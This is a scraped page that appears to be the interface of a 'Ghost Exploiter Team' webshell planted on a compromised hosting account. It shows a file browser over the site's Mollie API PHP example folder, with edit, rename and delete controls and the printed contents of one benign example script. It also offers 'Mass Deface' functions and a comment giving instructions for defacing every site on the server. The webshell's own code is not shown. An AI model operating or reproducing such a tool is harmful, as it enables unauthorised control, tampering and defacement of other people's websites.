webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
mollie
/
mollie-api-php
/
examples
/
profiles
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
create-profile.php
0.803KB
edt
ren
delete-profile.php
0.557KB
edt
ren
list-profiles.php
0.719KB
edt
ren
update-profile.php
0.897KB
edt
ren
<?php /* * Using OAuth access token to list profiles of an account. */ try { /* * Initialize the Mollie API library with your OAuth access token. */ require "../initialize_with_oauth.php"; /* * Get the all the profiles for this account. */ $profiles = $mollie->profiles->page(); foreach ($profiles as $profile) { echo '<div style="line-height:40px; vertical-align:top">'; echo htmlspecialchars($profile->name) . ' - ' . htmlspecialchars($profile->website) . ' (' . htmlspecialchars($profile->id) . ')'; echo '</div>'; } } catch (\Mollie\Api\Exceptions\ApiException $e) { echo "API call failed: " . htmlspecialchars($e->getMessage()); }
<=Back
Liking